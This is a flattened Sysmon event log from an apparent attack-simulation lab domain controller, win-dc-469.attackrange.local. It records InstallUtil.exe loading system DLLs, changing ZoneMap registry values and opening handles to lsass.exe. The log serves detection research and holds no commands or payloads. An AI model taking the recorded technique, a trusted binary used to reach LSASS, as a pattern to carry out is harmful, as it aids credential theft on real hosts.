(rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x800000000000000057457020Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:49.316{8B6011A9-78B9-618E-2CF7-04000000F101}7064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75EtrueMicrosoft WindowsValid 734700x800000000000000057457019Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:49.316{8B6011A9-78B9-618E-2CF7-04000000F101}7064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=0BC84513575743DA177F3DFE18D35CA7,SHA256=C40F6AA73073995E05E5379AE593A6617E8296C79A78BD7F716D95F98AE0D899trueMicrosoft WindowsValid 734700x800000000000000057457018Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:49.316{8B6011A9-78B9-618E-2CF7-04000000F101}7064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=C55F634054E45C0DEE47C254AE009928,SHA256=76EB0FCA87C3AD5FA1C46EB0AF88CF85E172525029E33F5DFC5645EF2EE6F575trueMicrosoft WindowsValid 734700x800000000000000057457017Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:49.316{8B6011A9-78B9-618E-2CF7-04000000F101}7064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\windows.storage.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=1D7997E3AFC26B85024D33F835E18056,SHA256=B2376967E156D4971FB66059F6367030AF937943D2EBF80AF856E643B6E95BBFtrueMicrosoft WindowsValid 13241300x800000000000000057457016Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 14:22:49.316{8B6011A9-78B9-618E-2CF7-04000000F101}7064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetectDWORD (0x00000000) 13241300x800000000000000057457015Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 14:22:49.316{8B6011A9-78B9-618E-2CF7-04000000F101}7064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranetDWORD (0x00000000) 13241300x800000000000000057457014Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 14:22:49.316{8B6011A9-78B9-618E-2CF7-04000000F101}7064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetectDWORD (0x00000000) 13241300x800000000000000057457013Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 14:22:49.316{8B6011A9-78B9-618E-2CF7-04000000F101}7064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranetDWORD (0x00000000) 10341000x800000000000000057457012Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:49.316{8B6011A9-886B-6164-0B00-00000000F101}6488060C:\Windows\system32\lsass.exe{8B6011A9-78B9-618E-2CF7-04000000F101}7064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057457011Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:49.316{8B6011A9-886B-6164-0B00-00000000F101}6488060C:\Windows\system32\lsass.exe{8B6011A9-78B9-618E-2CF7-04000000F101}7064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057457010Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:49.316{8B6011A9-78B9-618E-2CF7-04000000F101}7064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\sspicli.dll10.0.14393.2580 (rs1_release_inmarket.181009-1745)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsspicli.dllMD5=5061339CE61C0B32DB8F51A95E3B2422,SHA256=60558CA374334D4C6BBAD475921538C14A9FF3422893348A0503C1F33015FD25trueMicrosoft WindowsValid 12241200x800000000000000057457009Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 14:22:49.316{8B6011A9-78B9-618E-2CF7-04000000F101}7064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap 734700x800000000000000057457008Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:49.300{8B6011A9-78B9-618E-2CF7-04000000F101}7064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValid 734700x800000000000000057457007Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:49.300{8B6011A9-78B9-618E-2CF7-04000000F101}7064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=656F846CAED76C6FC5C76E8BACEF4EF6,SHA256=DFDE27C086764ACC1EA3E6A4E2BA50C2AB532F9E1D99203861F51910A8D850FBtrueMicrosoft WindowsValid 734700x800000000000000057457006Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:49.300{8B6011A9-78B9-618E-2CF7-04000000F101}7064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\iertutil.dll11.00.14393.4467 (rs1_release.210604-1844)Run time utility for Internet ExplorerInternet ExplorerMicrosoft CorporationIeRtUtil.dllMD5=1D608361848C3A3AC56488995E8D0BB1,SHA256=D95DE5DBAD08E22CB0CFB9322220E752F16124C15867F7748E4D64795E400EBFtrueMicrosoft WindowsValid 734700x800000000000000057457005Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:49.300{8B6011A9-78B9-618E-2CF7-04000000F101}7064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=D287E1BC5A148E2BCB482DBD0E925738,SHA256=1C2428AD170165DD8DE960C835D9AAB5B268300A676FE935B177ED5D2607430DtrueMicrosoft WindowsValid 734700x800000000000000057457004Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:49.300{8B6011A9-78B9-618E-2CF7-04000000F101}7064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\urlmon.dll11.00.14393.4530 (rs1_release.210705-0736)OLE32 Extensions for Win32Internet ExplorerMicrosoft CorporationUrlMon.dllMD5=B63DBDFEC215CF37259DC4A88ADBD0E7,SHA256=67B02F3DE0AF36E76C2D259CE7833EDA4FE33D935538E8A4C1E7E82130870FC1trueMicrosoft WindowsValid 734700x800000000000000057457003Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:49.300{8B6011A9-78B9-618E-2CF7-04000000F101}7064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Confe64a9051#\bcacaaa795f281ac827a1af051d3a051\System.Configuration.Install.ni.dll4.8.3761.0 built by: NET48REL1.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Configuration.Install.dllMD5=DF0A266E1C073131336B9597E2543820,SHA256=F1079A19E1C6E19EB1A2BA701A3919A0A0474EDFA579D8F3EC05965ECDF5F6FDfalse-Unavailable 734700x800000000000000057457002Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:49.300{8B6011A9-78B9-618E-2CF7-04000000F101}7064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll4.8.4380.0 built by: NET48REL1LAST_B.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.dllMD5=C928B5301D291782935A1342A01F6125,SHA256=945ACD65BDCE2291C3C2D15FD910F6E331570D516D386C53FDFB5EC38BE69125false-Unavailable 734700x800000000000000057457001Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:49.284{8B6011A9-78B9-618E-2CF7-04000000F101}7064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\clrjit.dll4.8.4410.0 built by: NET48REL1LAST_BMicrosoft .NET Runtime Just-In-Time CompilerMicrosoft® .NET FrameworkMicrosoft Corporationclrjit.dllMD5=0745D9F1BAC58E47CC87656768304313,SHA256=BBA1936354A9EF269B283FE706A74B73BE39CAF4DD57AB0D1CD06A1C75E260A2trueMicrosoft CorporationValid 734700x800000000000000057457000Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:49.284{8B6011A9-78B9-618E-2CF7-04000000F101}7064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=676B0A1FB2A01D19AECB1F19883B6FC4,SHA256=56DEB219840DBAF9DAF645AD5D79AF9AB05F20E688382854DD487F440B257552trueMicrosoft WindowsValid 734700x800000000000000057456999Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:49.284{8B6011A9-78B9-618E-2CF7-04000000F101}7064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\474c5d5d840d0a8b1974061ff11f02c2\mscorlib.ni.dll4.8.4410.0 built by: NET48REL1LAST_BMicrosoft Common Language Runtime Class LibraryMicrosoft® .NET FrameworkMicrosoft Corporationmscorlib.dllMD5=9955B914F307F0142D003E93A3A500BE,SHA256=1247284354586C375597AD8046AAC7F983BAAC74B545B674FB12DB4BAC5C6C01trueMicrosoft CorporationValid 734700x800000000000000057456998Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:49.284{8B6011A9-78B9-618E-2CF7-04000000F101}7064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=1AF6CD8B7CE4A852F67AA98C71AA1D26,SHA256=EF0DE008500A8C9C7908383AF11AE55845EBBE28C96C013EA720950BA89D3D28trueMicrosoft WindowsValid 734700x800000000000000057456997Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:49.284{8B6011A9-78B9-618E-2CF7-04000000F101}7064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\vcruntime140_clr0400.dll14.10.25028.0 built by: VCTOOLSD15RTMMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140_clr0400.dllMD5=63936588122BDEE9624D02CE3F8F54EA,SHA256=21F7E6165CE8DD92DB8CDF48CEE83DE64B2B0807B7B499CF87678B70C6F8C32FtrueMicrosoft CorporationValid 734700x800000000000000057456996Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:49.284{8B6011A9-78B9-618E-2CF7-04000000F101}7064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\ucrtbase_clr0400.dll14.10.25028.0 built by: VCTOOLSD15RTMMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationucrtbase_clr0400.dllMD5=F8F171BE1820544E15B555847005355C,SHA256=CDDF9A2BF085AE59BA464B3BA6394AACFC342DA5F17D77FD5306054C8AABF153trueMicrosoft CorporationValid 13241300x800000000000000057456995Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 14:22:49.284{8B6011A9-884A-6164-0100-00000000F101}4SystemHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\CIT\Module\Microsoft.NET/Framework64/v4.0.30319/clr.dll\\Device\HarddiskVolume1\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeQWORD (0x01d7d7d0-0xc53abaa3) 734700x800000000000000057456993Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:49.284{8B6011A9-78B9-618E-2CF7-04000000F101}7064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll4.8.4410.0 built by: NET48REL1LAST_BMicrosoft .NET Runtime Common Language Runtime - WorkStationMicrosoft® .NET FrameworkMicrosoft Corporationclr.dllMD5=1AF77AF533C702978D4C91C31DB1CCE5,SHA256=39AB2B2B034E3210D866FCF8649EB84C28E3DAB7CB7FA7C986346C6A9ED22D0AtrueMicrosoft CorporationValid 734700x800000000000000057456992Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:49.284{8B6011A9-78B9-618E-2CF7-04000000F101}7064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=CFDB018AC09F879CAAE7A66CA7880D57,SHA256=6AB95FD0D142CFFC3B9455AF51F003E1CD75B7F4323820390B975F9E1C8A47A5trueMicrosoft WindowsValid 734700x800000000000000057456991Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:49.284{8B6011A9-78B9-618E-2CF7-04000000F101}7064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 734700x800000000000000057456990Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:49.284{8B6011A9-78B9-618E-2CF7-04000000F101}7064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=E1024CF2E35DD3467F52BC83F7FEDA3F,SHA256=59C87761AD509BD096C2F35257C2370FB94B95160CB63FB9E66DFD8210AB002AtrueMicrosoft WindowsValid 734700x800000000000000057456989Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:49.284{8B6011A9-78B9-618E-2CF7-04000000F101}7064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x800000000000000057456988Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:49.284{8B6011A9-78B9-618E-2CF7-04000000F101}7064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x800000000000000057456987Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:49.284{8B6011A9-78B9-618E-2CF7-04000000F101}7064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\gdi32full.dll10.0.14393.4530 (rs1_release.210705-0736)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=9D82D7DBC3D9E0D8E86D10A5B1BF736E,SHA256=270CA1A42ECB4C22E826C1C95924F0014CC99254AB55B7167DA144D45E238E6DtrueMicrosoft WindowsValid 734700x800000000000000057456986Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:49.269{8B6011A9-78B9-618E-2CF7-04000000F101}7064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x800000000000000057456985Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:49.269{8B6011A9-78B9-618E-2CF7-04000000F101}7064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=8AAF6E1B14B9210052FFF90E25926D63,SHA256=F2120C8E63EA94F8618B31319A534731C16D8FDD58B0E1E70217D72A39D78353trueMicrosoft WindowsValid 734700x800000000000000057456984Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:49.269{8B6011A9-78B9-618E-2CF7-04000000F101}7064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x800000000000000057456983Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:49.269{8B6011A9-78B9-618E-2CF7-04000000F101}7064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\combase.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=878EBD02A580FDF8F187100127E6D3A8,SHA256=54E4BADDFBD97CFFF871B6D7316B28872218B92F37C41199F71EB37BC5634216trueMicrosoft WindowsValid 734700x800000000000000057456982Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:49.269{8B6011A9-78B9-618E-2CF7-04000000F101}7064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=F9E249B6BB80C06BA30A61854567796C,SHA256=E5F62CD5D2FE7BE8D4E029ECA004A8773FF8D1F7AB92C115810AD54B5B8F50CAtrueMicrosoft WindowsValid 734700x800000000000000057456981Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:49.269{8B6011A9-78B9-618E-2CF7-04000000F101}7064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll4.8.4180.0 built by: NET48REL1LAST_BMicrosoft .NET Runtime Execution EngineMicrosoft® .NET FrameworkMicrosoft Corporationmscoreei.dllMD5=899A8B655E52A061B33571D97C5C06ED,SHA256=DE05B03E37FB9BA5D74CF8FA36A6F0B15AB61705285B738BC90D14FDE580A45EtrueMicrosoft CorporationValid 734700x800000000000000057456980Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:49.269{8B6011A9-78B9-618E-2CF7-04000000F101}7064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4467 (rs1_release.210604-1844)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=B0C4BF9491FB453B77399E3C56C11DC8,SHA256=66D5D1B3D25D15EA8737C8B2EF83E770BA10931868F24DCACC50936F0A0BAC08trueMicrosoft WindowsValid 734700x800000000000000057456979Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:49.269{8B6011A9-78B9-618E-2CF7-04000000F101}7064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x800000000000000057456978Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:49.269{8B6011A9-78B9-618E-2CF7-04000000F101}7064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x800000000000000057456977Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:49.269{8B6011A9-78B9-618E-2CF7-04000000F101}7064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\advapi32.dll10.0.14393.4467 (rs1_release.210604-1844)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=A8CDCAC5C32D14ED8AADDF5489FC5D55,SHA256=140F07A8F6780DAFE20CC4FBE86C9332FB2F0C26ED8F49914BD05265C63EF6F1trueMicrosoft WindowsValid 10341000x800000000000000057456976Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:49.269{8B6011A9-C6FA-616E-9C35-01000000F101}41365516C:\Windows\system32\conhost.exe{8B6011A9-78B9-618E-2CF7-04000000F101}7064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057456975Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:49.269{8B6011A9-78B9-618E-2CF7-04000000F101}7064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x800000000000000057456974Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:49.269{8B6011A9-78B9-618E-2CF7-04000000F101}7064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x800000000000000057456973Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:49.269{8B6011A9-78B9-618E-2CF7-04000000F101}7064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\mscoree.dll10.0.14393.0 (rs1_release.160715-1616)Microsoft .NET Runtime Execution EngineMicrosoft® Windows® Operating SystemMicrosoft Corporationmscoree.dllMD5=5ECE402D7E12EC3750D044BF3D878DF6,SHA256=3F02B1AE7B61BC36B04EA2B82ED79F112219F4E9668518030FF14B005E2C9BBCtrueMicrosoft WindowsValid 